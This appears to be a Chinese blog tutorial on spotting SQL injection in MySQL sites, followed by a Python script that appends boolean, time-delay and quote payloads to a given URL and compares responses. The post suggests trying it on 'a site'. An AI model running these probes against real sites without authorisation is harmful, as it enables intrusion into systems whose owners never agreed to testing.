判断mysql网站是否存在注入漏洞的几个方法:
- 注入点后加上一个单引号会报错
- and 1=1返回正常页面,and 1=2返回的页面不同于正常页面
- and sleep(3) 网页会等待3秒左右
根据返回的页面情况我们就能知道是否存在注入漏洞
要获取页面返回的结果是不是一样的,我们可以通过获取请求头中的Content-Length的长度来判断
知道这些后,我们就能来写个简单的python脚本
# -*- coding:utf-8 -*-
__author__ = "MuT6 Sch01aR"
import requests
import argparse
import time
def argparse_option():
parser = argparse.ArgumentParser(description='The Help of Mysql_Inject.py')
parser.add_argument('-u','--url',help='The Url To Check')
args = parser.parse_args()
return args
def way_1(url):
payload = [' and 1=1',' and 1=2']
url_1 = url+payload[0]
url_2 = url+payload[1]
r = requests.get(url=url)
r_1 = requests.get(url=url_1)
r_2 = requests.get(url=url_2)
h = r.headers.get('Content-Length')
h_1 = r_1.headers.get('Content-Length')
h_2 = r_2.headers.get('Content-Length')
if h ==h_1 and h !=h_2:
print("[*] %s can be injected" %url)
else:
way_2(url)
def way_2(url):
payload = ' and sleep(5)'
t1 = time.time()
requests.get(url=url+payload)
t2 = time.time()
if t2-t1 >5:
print("[*] %s can be injected" %url)
else:
way_3(url)
def way_3(url):
payload = "'"
url_1 = url+payload
r = requests.get(url=url)
r_1 = requests.get(url=url_1)
h = r.headers.get('Content-Length')
h_1 = r_1.headers.get('Content-Length')
if h != h_1:
print("[*] %s can be injected" % url)
else:
print("[!] %s can't be injected" %url)
if __name__ == '__main__':
cmd_args = argparse_option()
url = cmd_args.url
if url:
way_1(url)
else:
print("Usage:python3 main.py -u [url]")
找个站测试一下
这个脚本还只能检测一些简单的链接,多参数的还检测不了